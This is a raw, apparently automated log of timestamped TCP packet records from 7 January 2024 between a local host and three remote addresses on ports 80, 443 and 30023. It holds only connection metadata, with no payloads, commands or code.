                                                                                                                                                                    Jan 7, 2024 05:29:52.770961046 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.771217108 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.771230936 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.771277905 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.771449089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.771644115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.771701097 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.775034904 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.775126934 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.775175095 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.815094948 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.815148115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.815164089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.815220118 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.815237999 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.815335989 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.816481113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.816574097 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.816620111 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.818658113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.818744898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.818792105 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.874567986 CET3002349747185.220.101.23192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.885596037 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.885673046 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.885741949 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.954828978 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.954893112 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.954963923 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.958214045 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.958230019 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.958283901 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.958524942 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.958548069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.958592892 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.962182045 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.962235928 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.962280035 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.964867115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.964961052 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.965007067 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.965019941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.965058088 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.965099096 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.965182066 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.965270042 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.965390921 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.965437889 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.965452909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.965487957 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.967807055 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.967895031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.967945099 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:52.969701052 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.969790936 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:52.969836950 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.009445906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.009955883 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.010016918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.010024071 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.010077000 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.010179996 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.010694027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.010710955 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.010751963 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.012840986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.012855053 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.012900114 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.080670118 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.080760002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.080804110 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.150151968 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.150183916 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.150331020 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.153333902 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.153372049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.153410912 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.153567076 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.153626919 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.153793097 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.157733917 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.157748938 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.157785892 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.160834074 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.160880089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.160893917 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.160918951 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.160949945 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.160983086 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.161443949 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.161462069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.161505938 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.161535025 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.161552906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.161590099 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.163593054 CET44349748172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.163717031 CET44349748172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.163764954 CET49748443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:53.163912058 CET49748443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:53.163929939 CET44349748172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.163988113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.164072990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.164108038 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.165790081 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.165806055 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.165846109 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.182032108 CET49750443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:53.182070971 CET44349750172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.182132959 CET49750443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:53.183267117 CET49750443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:53.183283091 CET44349750172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.205533981 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.205560923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.205574989 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.205588102 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.205601931 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.205621004 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.206173897 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.206188917 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.206223965 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.208524942 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.208542109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.208595991 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.274684906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.274775028 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.274838924 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.343832970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.343889952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.343935966 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.347584963 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.347656012 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.347728014 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.347949982 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.348052979 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.348092079 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.351432085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.351516008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.351557970 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.354511976 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.354613066 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.354626894 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.354655981 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.354687929 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.354726076 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.355134010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.355237007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.355278969 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.355304956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.355362892 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.355403900 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.357666016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.357743979 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.357786894 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.359774113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.359823942 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.359874964 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.369751930 CET44349750172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.369837999 CET49750443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:53.371068954 CET49750443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:53.371077061 CET44349750172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.371393919 CET44349750172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.372926950 CET49750443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:53.373043060 CET49750443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:53.373048067 CET44349750172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.381714106 CET4974730023192.168.2.4185.220.101.23
                                                                                                                                                                    Jan 7, 2024 05:29:53.399890900 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.400088072 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.400132895 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.400192976 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.400255919 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.400295019 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.400304079 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.400360107 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.400405884 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.402410984 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.402472019 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.402523041 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.469363928 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.469454050 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.469505072 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.537728071 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.537785053 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.537848949 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.541380882 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.541484118 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.541538000 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.541788101 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.541886091 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.541930914 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.545399904 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.545478106 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.545526981 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.548655987 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.548693895 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.548743963 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.550403118 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.550753117 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.550800085 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.551031113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.551090956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.551129103 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.551143885 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.551270962 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.551318884 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.552504063 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.552553892 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.552598953 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.554157019 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.554203987 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.554260015 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.555628061 CET3002349747185.220.101.23192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.594055891 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.594075918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.594094992 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.594116926 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.594132900 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.594158888 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.594185114 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.594187021 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.594223022 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.596267939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.596285105 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.596324921 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.663997889 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.664093018 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.664155006 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.732686043 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.732753038 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.732812881 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.736398935 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.736479044 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.736534119 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.736649990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.736705065 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.736742973 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.740561008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.740639925 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.740685940 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.743623972 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.743741035 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.743912935 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.745887041 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.745989084 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.746040106 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.746120930 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.746180058 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.746217966 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.746285915 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.746364117 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.746403933 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.747901917 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.748001099 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.748049021 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.749612093 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.749664068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.749708891 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.789448023 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.789474010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.789525986 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.789570093 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.789598942 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.789649963 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.789679050 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.789753914 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.789797068 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.791507006 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.791524887 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.791578054 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.802584887 CET44349750172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.802687883 CET44349750172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.802752018 CET49750443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:53.808378935 CET49750443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:53.808403015 CET44349750172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.822957993 CET49752443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:53.823039055 CET44349752172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.823112011 CET49752443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:53.823838949 CET49752443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:53.823857069 CET44349752172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.859401941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.859409094 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.859466076 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.927014112 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.927037001 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.927094936 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.930208921 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.930253029 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.930303097 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.930305004 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.930361986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.930402994 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.934575081 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.934654951 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.934704065 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.937541008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.937560081 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.937612057 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:53.939640999 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.939686060 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:53.939735889 CET4973580192.168.2.491.215.85.120
